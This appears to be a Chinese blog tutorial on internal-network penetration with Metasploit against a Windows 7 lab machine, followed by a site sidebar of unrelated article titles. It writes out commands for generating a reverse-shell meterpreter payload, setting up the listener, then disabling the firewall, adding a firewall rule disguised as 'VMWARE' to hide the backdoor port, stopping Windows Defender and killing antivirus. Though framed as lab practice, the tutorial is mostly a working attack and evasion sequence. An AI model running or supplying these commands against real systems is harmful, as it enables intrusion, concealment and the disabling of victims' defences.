当前位置:网站首页>内网渗透之内网信息收集(一)
内网渗透之内网信息收集(一)
2022-07-06 09:22:00 【不知名白帽】
目录
内网渗透之内网信息收集(二)_不知名白帽的博客-CSDN博客
Metasploit内网信息收集
攻击机 kali 192.168.0.103
靶机 win7 192.168.0.105
01msf反弹shell
首先生成一个payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=4444 -f exe > shell.exe

02msf反弹shell
配置反弹会话处理程序
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.103
set lport 4444
exploit

将payload发送到目标机器让其执行

执行成功

linux无法识别window汉字会乱码,修改一下代码页(65001代表的是UTF-8)

03通过shell关闭防火墙
shell(execute -f cmd -i -H)
netsh advfirewall set allprofiles state off (关闭防火墙)
netsh advfirewall show allprofiles (查看防火墙状况)

通过策略添加防火墙规则隐蔽行为
netsh advfirewall set add rule name= "VMWARE" protocol=TCP dir=in localport=4444 action=allow
netsh firewall add portopening TCP 4444 "VMWARE" ENABLE ALL
重启生效(令win7重启):
shutdown -r -f -t 0
04关闭杀毒软件
关闭windefend
net stop windefend
关闭杀毒软件
run killav
run post/windows/manage/killav
边栏推荐
- 2. First knowledge of C language (2)
- Safe driving skills on ice and snow roads
- Using qcommonstyle to draw custom form parts
- Miscellaneous talk on May 14
- Renforcer les dossiers de base de l'apprentissage
- 7-4 hash table search (PTA program design)
- Principles, advantages and disadvantages of two persistence mechanisms RDB and AOF of redis
- Matlab opens M file garbled solution
- Inaki Ading
- QT meta object qmetaobject indexofslot and other functions to obtain class methods attention
猜你喜欢

扑克牌游戏程序——人机对抗

A piece of music composed by buzzer (Chengdu)

强化學習基礎記錄

Custom RPC project - frequently asked questions and explanations (Registration Center)

Canvas foundation 2 - arc - draw arc

About the parental delegation mechanism and the process of class loading

Harmonyos JS demo application development

Hackmyvm target series (4) -vulny

PriorityQueue (large root heap / small root heap /topk problem)

2022 Teddy cup data mining challenge question C idea and post game summary
随机推荐
HackMyvm靶机系列(4)-vulny
Hackmyvm target series (3) -visions
Experiment 6 inheritance and polymorphism
Strengthen basic learning records
HackMyvm靶机系列(3)-visions
Hackmyvm target series (7) -tron
. How to upload XMIND files to Jinshan document sharing online editing?
JS several ways to judge whether an object is an array
Spot gold prices rose amid volatility, and the rise in U.S. prices is likely to become the key to the future
Nuxtjs快速上手(Nuxt2)
A piece of music composed by buzzer (Chengdu)
Wei Shen of Peking University revealed the current situation: his class is not very good, and there are only 5 or 6 middle-term students left after leaving class
渗透测试学习与实战阶段分析
HackMyvm靶机系列(2)-warrior
Detailed explanation of three ways of HTTP caching
Wechat applet
Hackmyvm target series (4) -vulny
记一次猫舍由外到内的渗透撞库操作提取-flag
MATLAB打开.m文件乱码解决办法
Callback function ----------- callback